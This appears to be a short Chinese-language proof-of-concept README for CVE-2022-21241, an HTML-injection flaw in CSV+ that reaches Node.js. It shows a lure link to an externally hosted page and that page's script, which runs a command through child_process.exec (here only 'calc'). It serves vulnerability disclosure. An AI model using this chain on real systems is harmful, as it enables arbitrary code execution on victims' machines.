👻 两次点击即可触发任意代码执行漏洞。

CVE-2022-21241
⚠
此 PoC 旨在提醒用户并帮助排查其自身 CSV+ 中的漏洞,禁止用于攻击行为。
以下版本受影响。
攻击者可利用 Node.js 功能执行任意代码。 他们会在某个网站上放置恶意 js 代码,并借助 CSV+ 中的 HTML 注入漏洞,通过 a 标签链接到该代码。

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html 是一个临时链接。
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>